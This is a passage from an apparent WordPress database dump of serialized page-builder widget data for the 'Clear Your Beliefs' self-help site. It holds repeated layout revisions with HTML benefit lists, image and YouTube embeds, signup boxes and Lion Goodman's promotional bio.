Your Beliefs "]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_tab]\n\n[su_tab title="How and Why It Works"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]\n\n[su_row]1[/su_column][su_row]2[/su_column]";s:4:"info";a:4:{s:4:"grid";s:1:"7";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:11:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1035, 1536, 'panels_data', 'a:3:{s:7:"widgets";a:11:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:611:"<strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong>\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:594:"<p><strong>What You Can Accomplish w</strong><strong style="line-height: 1.5;">ith </strong><strong>Clear Your Beliefs</strong></p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"1";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:9;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:10;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1194:"[su_tabs active="2"][su_tab title="What You Can Accomplish with Clear Your Beliefs "]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_tab]\n\n[su_tab title="How and Why It Works"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]\n\n[su_row][su_column size="1/2"]Content[/su_column]\n[su_column size="1/2"]Content[/su_column][/su_row]";s:4:"info";a:4:{s:4:"grid";s:1:"7";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"2";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:11:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:3:"0.5";s:4:"grid";s:1:"3";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:10;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1036, 1537, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1220:"[su_tabs active="2"][su_tab title="What You Can Accomplish with Clear Your Beliefs "]\n[su_row][su_column size="1/2"]\n<ul>\n	<li>Release hurt and pain from the past</li>\n	<li>Clear resistance to taking action</li>\n	<li>Open to new possibilities</li>\n	<li>Eliminate blocks to manifestation</li>\n	<li>Find your true purpose</li>\n	<li>Delete what’s been holding you back</li>\n</ul>\n[/su_column]\n[su_column size="1/2"]\n<ul style="margin-top: -20px;">\n	<li>Change your personality style</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your spiritual nature</li>\n	<li>Become less reactive, more calm</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column]\n[/su_row]\n[/su_tab]\n\n[su_tab title="How and Why It Works"]\n<ul>\n	<li>Beliefs are the major cause of upset and unhappiness</li>\n	<li>CYB clears beliefs at the core of the psyche, where they live</li>\n	<li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li>\n	<li>You take charge and decide what you want to believe</li>\n	<li>You’re guided gently, step-by-step, through the entire process</li>\n	<li>You decide how far to go, and what changes to make</li>\n</ul>\n[/su_tab][/su_tabs]";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  I’m always available for consultations and support of your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:579:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist? Healer?  Change Agent?</h3>\n<p style="text-align: center;">Bring the <em>Clear Your Beliefs</em> process into your practice.  Help your clients clear their beliefs so they can move their lives forward.</p>\n<p style="margin-left: 220px; margin-bottom: 0px;"><a href="http://clearyourbeliefs.com"><img class="aligncenter wp-image-1489 size-full" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_03.png" alt="btn_03" width="510" height="90" style="width: 365px;" /></a></p>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>Copyright 2014 Clear Your Beliefs</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1037, 1538, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:206:"<p><img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/header.jpg" alt="header" width="961" height="232" /></p>";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:394:"<center style="margin-top: -100px;">\n<div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe width="730" height="411" src="//www.youtube.com/embed/AGU_R_ZB540?rel=0" frameborder="0" allowfullscreen style="margin-top: -43px;"></iframe></div>\n</center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:373:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center><center style="margin-bottom: 44px;">[Form id="10"]</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:844:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: -15px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" /></center>\n<p style="text-align: center;"><strong>DOWNLOAD THE\niClearIt APP</strong>\n\n<p style="text-align: center;"><strong>Start Clearing Whatever\nIs In The Way Right\nNow</strong><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a> <a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a></p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:720:"[su_box title="Recorded Program" box_color="#1a2d8c" radius="8"]\n<p style="text-align: center;"><strong>Learn about the </strong><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n<strong>Program</strong>\n\n<p style="text-align: center;"> <big><strong>Clear Limiting and\nNegative Beliefs\nPermanently.</strong></big>\n\n<p style="text-align: center;"><strong>Eliminate Beliefs that\nBlock Abundance,\nLove, Relationships,\nand Manifesting\nWhat You Want</strong></center>\n\n<p style="text-align: center; margin-bottom: -5px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_10.png" alt="btn_10" width="225" height="60" /></a> [/su_box]</strong></p>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1227:"<p>[su_tabs active="2"][su_tab title="What You Can Accomplish with Clear Your Beliefs "][su_row][su_column size="1/2"]</p><ul><li>Release hurt and pain from the past</li><li>Clear resistance to taking action</li><li>Open to new possibilities</li><li>Eliminate blocks to manifestation</li><li>Find your true purpose</li><li>Delete what’s been holding you back</li></ul><p>[/su_column]<br /> [su_column size="1/2"]</p><ul style="margin-top: -20px;"><li>Change your personality style</li><li>Open to deeper, more profound love</li><li>Recognize your spiritual nature</li><li>Become less reactive, more calm</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column]<br /> [/su_row]<br /> [/su_tab]</p><p>[su_tab title="How and Why It Works"]</p><ul><li>Beliefs are the major cause of upset and unhappiness</li><li>CYB clears beliefs at the core of the psyche, where they live</li><li>All 3 levels of the mind are utilized: Subconscious, Conscious, and Super-conscious (Higher Self)</li><li>You take charge and decide what you want to believe</li><li>You’re guided gently, step-by-step, through the entire process</li><li>You decide how far to go, and what changes to make</li></ul><p>[/su_tab][/su_tabs]</p>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2208:"<div id="divStroke">\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />I’m Lion Goodman, creator of the Clear Your Beliefs program.  </strong>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with a dozen modalities of Psychology, scores of spiritual practices, and many esoteric disciplines. At the same time, I was a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nI am the co-author of “<em>Creating On Purpose: The Spiritual Technology of Manifestation</em>” (with Anodea Judith, Ph.D.).  I’ve written two eBooks, <em>Clear Your Beliefs </em>and <em>Menlightenment: A Book for Awakening Men.</em><em> </em>\n\nAll of this experience has culminated in the programs I offer here. In all of my exploration, I’ve found that the most powerful leverage for change is when we change our beliefs.  Because beliefs create our experience, we can change our experience of ourselves, of others, and the world itself.  The only question is, “What’s the best way to change my beliefs?”  This is it.  I’ve created what hundreds of students and clients have called “the magic wand of belief change.”\n\nJoin me in exploring your own subconscious mind.  Read the eBook, and download the free app.  Then come back and purchase the <em>Clear Your Beliefs </em>program.  I’ll take you through a cleanout of your subconscious beliefs – what we call the Belief Closet.  You’ll feel better, function better, and resistance and blocks will melt away ­­– like magic.  And did I mention that it’s fun?\n\nI look forward to hearing your feedback.  